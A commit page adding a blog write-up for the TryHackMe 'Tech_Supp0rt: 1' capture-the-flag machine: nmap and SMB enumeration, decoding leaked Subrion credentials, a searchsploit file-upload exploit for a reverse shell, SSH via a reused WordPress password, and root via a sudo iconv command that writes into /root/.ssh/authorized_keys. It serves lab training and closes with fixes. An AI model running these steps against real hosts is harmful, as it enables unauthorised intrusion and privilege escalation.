d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests 1 Actions Packages Projects Releases Wiki Activity

add: writeup-ctf
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details

Browse Source
This commit is contained in:
d3vyce
2024-03-02 21:49:07 +01:00
parent ff520654f0
commit 095a13b2c9
1021 changed files with 9299 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

162
content/writeup-ctf/writeup-techsupp0rt1-thm/index.md Normal file
View File

@ -0,0 +1,162 @@
---
title: "Writeup - Tech_Supp0rt: 1 (THM)"
date: 2022-05-14
slug: "writeup-techsupp0rt1-thm"
type: "writeup-ctf"
---
This is a writeup for the [Tech\_Supp0rt](https://tryhackme.com/room/techsupp0rt1) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.10.222.86
```
Four TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 7.2p2)
- 80/tcp : HTTP web server (Apache 2.4.18)
- 139/tcp : Samba (3.X - 4.X)
- 445/tcp : Samba  (3.X - 4.X)
![](img/image-2.webp)
## Exploit
First, I start by scanning the site's folders.
![](img/image-3.webp)
We find 2 interesting files:
![](img/image-4.webp)
![](img/image-5.webp)
After some research on the 2 sites, I decide to look at the smb server. For that I try to connect anonymously.
![](img/image-6.webp)
It works and I can get an `enter.txt` file.
```bash
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
```
In this file we learn the existence of another site in the `Subrion` folder, but in addition we are provided with credentials for it. After testing, the password doesn't seem to work. So I make a scan of the file to see if I can find something interesting:
![](img/image-7.webp)
A `robots.txt` file but nothing special in it:
```bash
User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/
```
So I try to decrypt the password with CyberChef. As soon as I propose the string of characters, CyberChef decodes the following string of characters: [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=N3NLdm50WGRQRUpheGF6Y2U5UFhpMjR6YUZyTGlLV0Nr)
![](img/image-8.webp)
So I try to use this password.
![](img/image-9.webp)
Now that I am connected and I know the version of Subrion, I start looking for exploits to have a reverse shell.
```bash
┌──(d3vyce㉿kali)-[~]
└─$ searchsploit subrion 4.2.1
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
Quickly I find a file sending exploit that would allow to get a reverse shell. I download it with the following command:
```bash
searchsploit -x php/webapps/49876.py > exploit.py
```
Then I run it with the following command:
![](img/image-10.webp)
Another solution to have a reverse shell would have been to use the upload page present in : content -> upload. While trying this solution I noticed that the version with the `.php` extension does not work but the `.phar` version does:
![](img/image-11.webp)
Searching I find that the first flag is held by the user `scamsite`. So I go to the wordpress folder to see if I can find information in the configuration files:
```bash
[...]
/** MySQL database username */
define( 'DB_USER', 'support' );
/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
[...]
```
So I try to connect via SSH with this password and it works. So I can recover the first flag.
![](img/image-12.webp)
## Privilege escalation
I start by looking at the sudo permissions:
![](img/image-13.webp)
My user has the right to execute the `iconv` command with root rights, so I'm looking for exploits on the GTFObin site: [iconv](https://gtfobins.github.io/gtfobins/iconv/#sudo).
There is a possibility to write in a file with this command. I will write my public RSA key in the `authorized_keys` to be able to connect in SSH:
```bash
echo "id_rsa.pub" | sudo iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys
```
I now have a root shell and can retrieve the last flag.
![](img/image-14.webp)
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Do not allow anonymous access on an SMB server
- Do not leave passwords in accessible files
- Do not leave executable applications with sudo root if not necessary